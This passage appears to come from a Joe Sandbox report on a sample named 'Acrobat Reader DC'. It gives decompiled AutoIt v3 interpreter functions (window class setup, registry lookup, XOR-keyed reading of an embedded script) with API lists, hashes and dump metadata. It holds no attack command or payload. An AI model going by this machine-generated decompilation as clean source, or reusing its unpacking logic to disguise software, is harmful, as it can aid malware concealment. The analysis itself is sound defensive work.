                                  				_t44 = E004115D7(_t95, _t98, _t109);
                                  				_t89 =  *0x4a9124; // 0x1
                                  				_t75 =  *0x4a9120; // 0xa76d30
                                  				 *((intOrPtr*)(_t75 + _t89 * 4)) = _t44;
                                  				_t45 =  *0x4a9124; // 0x1
                                  				_t76 =  *0x4a9120; // 0xa76d30
                                  				 *0x4a9124 = _t45 + 1;
                                  				E00411567( *((intOrPtr*)(_t76 + _t45 * 4)),  &_v1580);
                                  				_t107 = (_t103 & 0xfffffff8) - 0x63c + 0x44;
                                  				E0040BC70( &_v1596, _t109);
                                  				_t49 = E0040E4C0( &_v1596, _t109); // executed
                                  				if(_t49 != 0) {
                                  					_t96 = 0;
                                  					__eflags = 0;
                                  					_v1580 = 0;
                                  					while(1) {
                                  						_t100 =  &_v1596;
                                  						_v1600 =  *((intOrPtr*)(E00401C90(_t96,  &_v1596, __eflags)));
                                  						_v1598 = 0;
                                  						__eflags =  *((intOrPtr*)(E00401C90(_t96,  &_v1596, __eflags)));
                                  						if(__eflags == 0) {
                                  							goto L6;
                                  						}
                                  						L4:
                                  						_t65 = E00401C90(_t96, _t100, __eflags);
                                  						__eflags =  *_t65 - 0x3b;
                                  						if( *_t65 == 0x3b) {
                                  							goto L6;
                                  						}
                                  						E00411536( &_v1580,  &_v1600);
                                  						_t107 = _t107 + 8;
                                  						_t96 = _t96 + 1;
                                  						while(1) {
                                  							_t100 =  &_v1596;
                                  							_v1600 =  *((intOrPtr*)(E00401C90(_t96,  &_v1596, __eflags)));
                                  							_v1598 = 0;
                                  							__eflags =  *((intOrPtr*)(E00401C90(_t96,  &_v1596, __eflags)));
                                  							if(__eflags == 0) {
                                  								goto L6;
                                  							}
                                  							goto L4;
                                  						}
                                  						L6:
                                  						_t53 = E004111C1( &_v1580);
                                  						_t108 = _t107 + 4;
                                  						__eflags = _t53;
                                  						if(__eflags != 0) {
                                  							_t63 = E004111C1( &_v1580);
                                  							_t108 = _t108 + 4;
                                  							__eflags =  *((short*)(_t108 + 0x1e + _t63 * 2)) - 0x5c;
                                  							if(__eflags != 0) {
                                  								E00411536( &_v1580, "\\");
                                  								_t108 = _t108 + 8;
                                  							}
                                  						}
                                  						_push(0x20a);
                                  						_t54 = E004115D7(_t96, _t100, __eflags);
                                  						_t80 =  *0x4a9124; // 0x1
                                  						_t93 =  *0x4a9120; // 0xa76d30
                                  						 *((intOrPtr*)(_t93 + _t80 * 4)) = _t54;
                                  						_t55 =  *0x4a9124; // 0x1
                                  						_t94 =  *0x4a9120; // 0xa76d30
                                  						 *0x4a9124 = _t55 + 1;
                                  						E00412FBA( *((intOrPtr*)(_t94 + _t55 * 4)),  &_v1580, 0x104);
                                  						_t107 = _t108 + 0x10;
                                  						_v1580 = 0;
                                  						__eflags =  *((intOrPtr*)(E00401C90(_t96,  &_v1596, __eflags)));
                                  						if(__eflags == 0) {
                                  							goto L1;
                                  						} else {
                                  							_t96 = _t96 + 1;
                                  							continue;
                                  						}
                                  					}
                                  				}
                                  				L1:
                                  				E00402250( &_v1596);
                                  				return 0x4a90e8;
                                  			}

































                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                  • __wsplitpath.LIBCMT ref: 0040E41C
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • _wcsncat.LIBCMT ref: 0040E433
                                  • __wmakepath.LIBCMT ref: 0040E44F
                                    • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  • _wcscpy.LIBCMT ref: 0040E487
                                    • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                  • _wcscat.LIBCMT ref: 00427541
                                  • _wcslen.LIBCMT ref: 00427551
                                  • _wcslen.LIBCMT ref: 00427562
                                  • _wcscat.LIBCMT ref: 0042757C
                                  • _wcsncpy.LIBCMT ref: 004275BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                  • String ID: Include$\
                                  • API String ID: 3173733714-3429789819
                                  • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                  • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                  • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                  • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 88%
                                  			E004528BD(void* __eflags, signed int _a4, char _a8, intOrPtr* _a12, signed int* _a16, char _a19) {
                                  				char _v8;
                                  				signed int _v12;
                                  				short _v32;
                                  				short _v582;
                                  				short _v1104;
                                  				short _v1108;
                                  				short _v1112;
                                  				short _v1116;
                                  				short _v1120;
                                  				short _v1124;
                                  				short _v1128;
                                  				short _v1132;
                                  				short _v1136;
                                  				char _v1140;
                                  				char _v1668;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t56;
                                  				intOrPtr _t67;
                                  				intOrPtr _t68;
                                  				signed int* _t86;
                                  				intOrPtr _t87;
                                  				void* _t110;
                                  				intOrPtr* _t113;
                                  
                                  				_t86 = _a16;
                                  				_t113 = _a4;
                                  				_push(0);
                                  				_v1140 = 0;
                                  				_v1136 = 0;
                                  				_v1132 = 0;
                                  				_v1128 = 0;
                                  				_v1124 = 0;
                                  				_v1120 = 0;
                                  				_v1116 = 0;
                                  				_v1112 = 0;
                                  				_v1108 = 0;
                                  				_v32 = 0;
                                  				_v1104 = 0;
                                  				_push( *((intOrPtr*)(_t113 + 4)));
                                  				_push( *_t113);
                                  				_v582 = 0;
                                  				_v8 = 1;
                                  				E004150D1(_t86, 0, _t110, _t113, __eflags); // executed
                                  				_t56 = E00452719(__eflags, _t113, _a8,  &_v1668); // executed
                                  				if(_t56 == 0) {
                                  					E00414D04( &_a19, 1, 1,  *_t113);
                                  					E00414D04( &_a4, 4, 1,  *_t113);
                                  					_t112 = _a4 ^ 0x000087bc;
                                  					E00414D04( &_a4, 4, 1,  *_t113);
                                  					 *_t86 = _a4 ^ 0x000087bc;
                                  					E00414D04( &_a4, 4, 1,  *_t113);
                                  					_push(1);
                                  					_push(0x10);
                                  					_push( *_t113);
                                  					_v12 = _a4 ^ 0x0000a685;
                                  					E004150D1(_t86,  *_t113, _a4 ^ 0x000087bc, _t113, __eflags); // executed
                                  					_t67 = E004135BB( *_t86, _a4 ^ 0x000087bc, _t113,  *_t86); // executed
                                  					_a8 = _t67;
                                  					_t68 = E004135BB( *_t86, _a4 ^ 0x000087bc, _t113, _t112); // executed
                                  					_t87 = _t68;
                                  					E00414D04(_t87, _t112, 1,  *_t113); // executed
                                  					E0044AFEF( *((intOrPtr*)(_t113 + 8)) + 0x2477, __eflags, _t87, _t112,  *((intOrPtr*)(_t113 + 8)) + 0x2477);
                                  					E00432229( &_v8, _t87, _t112);
                                  					__eflags = _v12 - _v8;
                                  					if(_v12 == _v8) {
                                  						__eflags = _a19 - 1;
                                  						if(_a19 != 1) {
                                  							E00413748(_a8);
                                  							_a8 = _t87;
                                  						} else {
                                  							_v1132 = 0;
                                  							_v1128 = 0;
                                  							_v1124 = 0;
                                  							_v1112 = 0;
                                  							_v1108 = 0;
                                  							_v32 = 0;
                                  							_v1120 = 1;
                                  							_v1116 = 1;
                                  							_v1104 = 0;
                                  							_v582 = 0;
                                  							_v1136 = _t87;
                                  							_v1140 = _a8;
                                  							E0044B1A9(_a8, _t112,  &_v1140); // executed
                                  							E00413748(_t87); // executed
                                  						}
                                  						 *_a12 = _a8;
                                  						__eflags = 0;
                                  						return 0;
                                  					} else {
                                  						E00413748(_a8);
                                  						E00413748(_t87);
                                  						return 0xa;
                                  					}
                                  				} else {
                                  					return 6;
                                  				}
                                  			}






























                                  APIs
                                  • _fseek.LIBCMT ref: 0045292B
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                  • __fread_nolock.LIBCMT ref: 00452961
                                  • __fread_nolock.LIBCMT ref: 00452971
                                  • __fread_nolock.LIBCMT ref: 0045298A
                                  • __fread_nolock.LIBCMT ref: 004529A5
                                  • _fseek.LIBCMT ref: 004529BF
                                  • _malloc.LIBCMT ref: 004529CA
                                  • _malloc.LIBCMT ref: 004529D6
                                  • __fread_nolock.LIBCMT ref: 004529E7
                                  • _free.LIBCMT ref: 00452A17
                                  • _free.LIBCMT ref: 00452A20
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                  • String ID:
                                  • API String ID: 1255752989-0
                                  • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                  • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                  • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                  • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 100%
                                  			E00410390() {
                                  				struct _WNDCLASSEXW _v52;
                                  				struct HICON__* _t18;
                                  				struct HICON__* _t19;
                                  				intOrPtr _t21;
                                  				void* _t22;
                                  				short _t23;
                                  				void* _t24;
                                  				void* _t25;
                                  				struct HICON__* _t26;
                                  				struct HICON__* _t28;
                                  				struct HICON__* _t29;
                                  				struct HBRUSH__* _t34;
                                  				int _t36;
                                  
                                  				_t34 = GetSysColorBrush(0xf);
                                  				_t26 = LoadCursorW(0, 0x7f00);
                                  				_t18 = LoadIconW( *0x497520, 0x63); // executed
                                  				 *0x4a7f40 = _t18; // executed
                                  				_t19 = LoadIconW( *0x497520, 0xa4); // executed
                                  				 *0x4a7f48 = _t19;
                                  				 *0x4a7f4c = LoadIconW( *0x497520, 0xa2);
                                  				_t21 =  *0x4a9604; // 0xa72e98
                                  				if( *((char*)(_t21 + 0x1f)) == 0) {
                                  					_t22 = E0044395E(4);
                                  					_t36 = 0;
                                  				} else {
                                  					_t36 = 0;
                                  					_t22 = LoadImageW( *0x497520, 0x63, 1, 0x10, 0x10, 0);
                                  				}
                                  				_t28 =  *0x4a7f40; // 0x1c0087
                                  				_v52.hInstance =  *0x497520;
                                  				 *0x4a7f44 = _t22;
                                  				_v52.cbSize = 0x30;
                                  				_v52.style = 0x23;
                                  				_v52.cbClsExtra = _t36;
                                  				_v52.cbWndExtra = _t36;
                                  				_v52.hCursor = _t26;
                                  				_v52.hbrBackground = _t34;
                                  				_v52.lpszMenuName = _t36;
                                  				_v52.lpszClassName = L"AutoIt v3";
                                  				_v52.hIcon = _t28;
                                  				_v52.hIconSm = _t22;
                                  				_v52.lpfnWndProc = E004010E0;
                                  				_t23 = RegisterClassExW( &_v52);
                                  				_t29 =  *0x4a7f40; // 0x1c0087
                                  				 *0x4974e4 = _t23;
                                  				_t24 =  *0x4a7f44; // 0xf045b
                                  				_t25 = E00410490(_t29, _t24); // executed
                                  				return _t25;
                                  			}

















                                  APIs
                                  • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                  • LoadIconW.USER32(?,00000063), ref: 004103C0
                                  • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                  • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                  • LoadImageW.USER32 ref: 0041040E
                                  • RegisterClassExW.USER32 ref: 0041045D
                                    • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                    • Part of subcall function 00410490: RegisterClassExW.USER32 ref: 004104ED
                                    • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                    • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                    • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                    • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                    • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00AAF920,000000FF,00000000), ref: 00410552
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                  • String ID: #$0$AutoIt v3
                                  • API String ID: 423443420-4155596026
                                  • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                  • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                  • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                  • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 82%
                                  			E00410490(intOrPtr _a4, intOrPtr _a8) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				struct _WNDCLASSEXW _v60;
                                  				struct HINSTANCE__* _t19;
                                  				void* _t25;
                                  				void* _t26;
                                  				int _t27;
                                  				struct HINSTANCE__* _t29;
                                  				void* _t31;
                                  
                                  				_t19 =  *0x497520;
                                  				 *0x4a8684 = _t19;
                                  				_v60.cbSize = 0x30;
                                  				_v60.style = 0x2b;
                                  				_v60.cbClsExtra = 0;
                                  				_v60.cbWndExtra = 0x1e;
                                  				_v60.hInstance = _t19;
                                  				_v60.hCursor = 0;
                                  				_v60.hbrBackground = GetSysColorBrush(0xf);
                                  				_v60.lpszMenuName = 0;
                                  				_v60.hIconSm = _a8;
                                  				_v60.hIcon = _a4;
                                  				_v60.lpszClassName = L"AutoIt v3 GUI";
                                  				_v60.lpfnWndProc = 0x47f08f;
                                  				 *0x4974e0 = RegisterClassExW( &_v60);
                                  				 *0x4a8688 = RegisterWindowMessageW(L"TaskbarCreated");
                                  				_v12 = 8;
                                  				_v8 = 0x13b;
                                  				__imp__InitCommonControlsEx( &_v12);
                                  				_t25 = ImageList_Create(0x10, 0x10, 0x21, 1, 1);
                                  				_t29 =  *0x4a8684; // 0x400000
                                  				 *0x4a86dc = _t25;
                                  				_t26 = LoadIconW(_t29, 0xa9);
                                  				_t31 =  *0x4a86dc; // 0xaaf920
                                  				_t27 = ImageList_ReplaceIcon(_t31, 0xffffffff, _t26); // executed
                                  				 *0x4a86e0 = 0;
                                  				return _t27;
                                  			}













                                  APIs
                                  • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                  • RegisterClassExW.USER32 ref: 004104ED
                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                  • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                  • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                  • ImageList_ReplaceIcon.COMCTL32(00AAF920,000000FF,00000000), ref: 00410552
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                  • String ID: +$0$TaskbarCreated
                                  • API String ID: 2914291525-888179712
                                  • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                  • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                  • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                  • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E0040A780(void __ecx, void* __fp0, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
                                  				char _v28;
                                  				void _v32;
                                  				char _v48;
                                  				char _v52;
                                  				intOrPtr _v56;
                                  				void* _v60;
                                  				char _v64;
                                  				char _v68;
                                  				void _v72;
                                  				char _v76;
                                  				void _v80;
                                  				char _v84;
                                  				char _v85;
                                  				void* _v92;
                                  				char _v95;
                                  				short _v96;
                                  				void _v100;
                                  				void* _v104;
                                  				void* _v108;
                                  				void _v112;
                                  				char _v115;
                                  				short _v116;
                                  				char _v119;
                                  				void* _v120;
                                  				void* _v124;
                                  				void* _v128;
                                  				void _v136;
                                  				void* _v140;
                                  				char _v148;
                                  				void* _v152;
                                  				void* _v156;
                                  				void _v160;
                                  				void __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t371;
                                  				intOrPtr _t380;
                                  				void* _t381;
                                  				void* _t382;
                                  				void** _t384;
                                  				void* _t385;
                                  				void* _t387;
                                  				void* _t388;
                                  				void* _t389;
                                  				intOrPtr _t390;
                                  				void* _t409;
                                  				void* _t411;
                                  				void* _t412;
                                  				void* _t413;
                                  				signed int _t414;
                                  				void* _t422;
                                  				void** _t427;
                                  				void* _t428;
                                  				void* _t430;
                                  				void* _t431;
                                  				void* _t438;
                                  				void* _t442;
                                  				void* _t443;
                                  				void* _t446;
                                  				void* _t448;
                                  				void* _t449;
                                  				void* _t450;
                                  				void* _t451;
                                  				signed int _t452;
                                  				void* _t459;
                                  				void _t490;
                                  				short _t491;
                                  				void* _t492;
                                  				void* _t493;
                                  				void* _t494;
                                  				void** _t495;
                                  				void* _t496;
                                  				void* _t499;
                                  				void* _t501;
                                  				void** _t502;
                                  				void* _t503;
                                  				signed int _t508;
                                  				void** _t517;
                                  				void* _t521;
                                  				void* _t525;
                                  				void* _t531;
                                  				void* _t534;
                                  				void* _t546;
                                  				void _t547;
                                  				void* _t551;
                                  				void _t554;
                                  				signed int* _t559;
                                  				void* _t563;
                                  				signed int _t572;
                                  				void* _t574;
                                  				void* _t575;
                                  				void* _t594;
                                  
                                  				_t594 = __fp0;
                                  				_t574 = (_t572 & 0xfffffff8) - 0x84;
                                  				_v112 = __ecx;
                                  				_t580 =  *0x4a9600 & 0x00000001;
                                  				if(( *0x4a9600 & 0x00000001) == 0) {
                                  					 *0x4a9600 =  *0x4a9600 | 0x00000001;
                                  					 *0x4a95f0 = 0;
                                  					 *0x4a95f8 = 1;
                                  					 *0x4a95fc = 0;
                                  					E0041130A(__eflags, 0x425c21);
                                  					_t574 = _t574 + 4;
                                  				}
                                  				_t563 = _a12;
                                  				_push(8);
                                  				_v96 = 1;
                                  				_v128 = _t563;
                                  				_v124 = 0;
                                  				_v120 = 0;
                                  				_v116 = 1;
                                  				_t371 = E004115D7(0, _t563, _t580);
                                  				_t575 = _t574 + 4;
                                  				if(_t371 == 0) {
                                  					_t371 = 0;
                                  				} else {
                                  					 *_t371 = 0x14;
                                  				}
                                  				 *((intOrPtr*)(_t371 + 4)) = 0;
                                  				_t559 = _a8;
                                  				_v100 = _t371;
                                  				_v104 = 1;
                                  				_v108 = 0x17;
                                  				_v92 = ( *( *((intOrPtr*)(_a4 + 4)) +  *_t559 * 4))[2];
                                  				while(1) {
                                  					L4:
                                  					_t508 =  *_t559;
                                  					if(_t508 == _a16) {
                                  						goto L9;
                                  					}
                                  					L5:
                                  					_t380 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + _t508 * 4));
                                  					if( *((short*)(_t380 + 8)) == 0x7f) {
                                  						goto L9;
                                  					}
                                  					_t491 =  *((short*)(_t380 + 8));
                                  					if(_t491 == 0x36) {
                                  						_t492 = _v124;
                                  						_v108 = 0x16;
                                  						__eflags = _t492;
                                  						if(_t492 != 0) {
                                  							__eflags = _v115;
                                  							if(__eflags == 0) {
                                  								_push(0x18);
                                  								_t381 = E004115D7(_t559, _t563, __eflags);
                                  								_t575 = _t575 + 4;
                                  								__eflags = _t381;
                                  								if(_t381 == 0) {
                                  									_t382 = 0;
                                  								} else {
                                  									_v136 = _t381;
                                  									_t496 = _v136;
                                  									E0040B960(0x4a95f0, _t496, _t508, _t559);
                                  									_t382 = _t496;
                                  									_t492 = _v124;
                                  								}
                                  								 *((intOrPtr*)(_t382 + 0x10)) = _v120;
                                  								_v120 = _t382;
                                  							} else {
                                  								E00408E80(_v120, _t508, 0x4a95f0);
                                  								_t492 = _v128;
                                  								_v119 = 0;
                                  							}
                                  							L31:
                                  							_t384 =  *( *((intOrPtr*)(_a4 + 4)) +  *_t559 * 4);
                                  							_t493 = _t492 + 1;
                                  							_v124 = _t493;
                                  							__eflags = _t493 - 1;
                                  							if(_t493 != 1) {
                                  								__eflags = _v115;
                                  								_t543 = _v120;
                                  								if(_v115 != 0) {
                                  									_v136 =  *((intOrPtr*)(_t543 + 0x10));
                                  								} else {
                                  									_v136 = _t543;
                                  								}
                                  							} else {
                                  								_v136 = _t563;
                                  							}
                                  							_t517 = _v136;
                                  							_t494 =  *_t384;
                                  							_t385 = _t517[3];
                                  							__eflags = _t385;
                                  							if(_t385 != 0) {
                                  								E004431AD(_t385);
                                  								_t517 = _v140;
                                  								_t517[3] = 0;
                                  							}
                                  							_t387 = _t517[2];
                                  							__eflags = _t387 - 8;
                                  							if(_t387 == 8) {
                                  								_t543 =  *_t517;
                                  								__eflags = _t543;
                                  								if(_t543 == 0) {
                                  									goto L35;
                                  								}
                                  								__imp__#9(_t543);
                                  								_t543 =  *_v140;
                                  								_push( *_v140);
                                  								E004111DC();
                                  								_t575 = _t575 + 4;
                                  								goto L39;
                                  							} else {
                                  								L35:
                                  								__eflags = _t387 - 0xa;
                                  								if(_t387 == 0xa) {
                                  									_t518 =  *_t517;
                                  									__eflags =  *_t517;
                                  									if(__eflags != 0) {
                                  										E0044318E(_t518);
                                  									}
                                  								} else {
                                  									__eflags = _t387 - 5;
                                  									if(_t387 == 5) {
                                  										E0040E270(_v136, _t563);
                                  									} else {
                                  										__eflags = _t387 - 0xb;
                                  										if(_t387 == 0xb) {
                                  											_t521 =  *_v136;
                                  											_t543 =  *(_t521 + 4);
                                  											_push( *(_t521 + 4));
                                  											E004111DC();
                                  											_push( *_v136);
                                  											E004111DC();
                                  											_t575 = _t575 + 8;
                                  										} else {
                                  											__eflags = _t387 - 0xc;
                                  											if(__eflags == 0) {
                                  												_t523 =  *_t517;
                                  												__eflags =  *_t517;
                                  												if(__eflags != 0) {
                                  													E0044B3D9(_t523);
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  								L39:
                                  								_t388 = _v136;
                                  								_push(0x10);
                                  								 *_t388 = 0;
                                  								 *(_t388 + 8) = 4;
                                  								_t389 = E004115D7(_t559, _t563, __eflags);
                                  								_t575 = _t575 + 4;
                                  								__eflags = _t389;
                                  								if(_t389 == 0) {
                                  									_t389 = 0;
                                  								} else {
                                  									 *_t389 =  *_t494;
                                  									 *((intOrPtr*)(_t389 + 4)) =  *((intOrPtr*)(_t494 + 4));
                                  									_t543 =  *(_t494 + 8);
                                  									 *(_t389 + 8) =  *(_t494 + 8);
                                  									_t495 =  *(_t494 + 0xc);
                                  									 *(_t389 + 0xc) = _t495;
                                  									 *_t495 =  *_t495 + 1;
                                  									__eflags =  *_t495;
                                  								}
                                  								 *(_v136 + 0xc) = _t389;
                                  								_t390 = _v112;
                                  								 *_t559 = 1 +  *_t559;
                                  								__eflags =  *((char*)(_t390 + 0xfd));
                                  								if( *((char*)(_t390 + 0xfd)) != 0) {
                                  									E00457F66(_t543, __eflags, _t594, E0040D0B0( &_v128));
                                  									_t390 = _v116;
                                  								}
                                  								__eflags =  *((char*)(_t390 + 0xfe));
                                  								if( *((char*)(_t390 + 0xfe)) != 0) {
                                  									E00472F47(_v112, __eflags, _t594, _v112, E0040D0B0( &_v128));
                                  								}
                                  								while(1) {
                                  									L4:
                                  									_t508 =  *_t559;
                                  									if(_t508 == _a16) {
                                  										goto L9;
                                  									}
                                  									goto L5;
                                  								}
                                  							}
                                  						}
                                  						__eflags = _t563 - 0x4a95f0;
                                  						if(_t563 == 0x4a95f0) {
                                  							goto L31;
                                  						}
                                  						_t409 =  *(_t563 + 0xc);
                                  						__eflags = _t409;
                                  						if(_t409 != 0) {
                                  							E004431AD(_t409);
                                  							 *(_t563 + 0xc) = 0;
                                  						}
                                  						_t411 =  *(_t563 + 8);
                                  						__eflags = _t411 - 8;
                                  						if(_t411 == 8) {
                                  							_t525 =  *_t563;
                                  							__eflags = _t525;
                                  							if(_t525 == 0) {
                                  								goto L25;
                                  							}
                                  							__imp__#9(_t525);
                                  							_push( *_t563);
                                  							E004111DC();
                                  							_t575 = _t575 + 4;
                                  							goto L29;
                                  						} else {
                                  							L25:
                                  							__eflags = _t411 - 0xa;
